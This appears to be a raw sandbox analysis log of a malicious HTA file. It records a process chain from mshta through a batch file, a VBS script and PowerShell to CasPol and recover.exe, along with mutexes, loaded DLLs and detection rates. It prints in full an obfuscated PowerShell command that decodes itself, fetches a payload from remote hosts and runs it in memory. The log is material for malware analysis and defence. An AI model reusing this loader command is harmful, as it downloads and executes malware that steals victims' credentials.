Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_0041AC43

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\0[1].txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\kmbgnrgsd-N2XF5V
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Windows\Temp\anonymiser.bat

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"

Source: C:\Windows\SysWOW64\recover.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 0000000A.00000002.1120527803.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: creatingbestthingsforhisbeststepstotakehim.hta	Virustotal: Detection: 23%
Source: creatingbestthingsforhisbeststepstotakehim.hta	ReversingLabs: Detection: 19%

Source: C:\Windows\SysWOW64\recover.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\creatingbestthingsforhisbeststepstotakehim.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
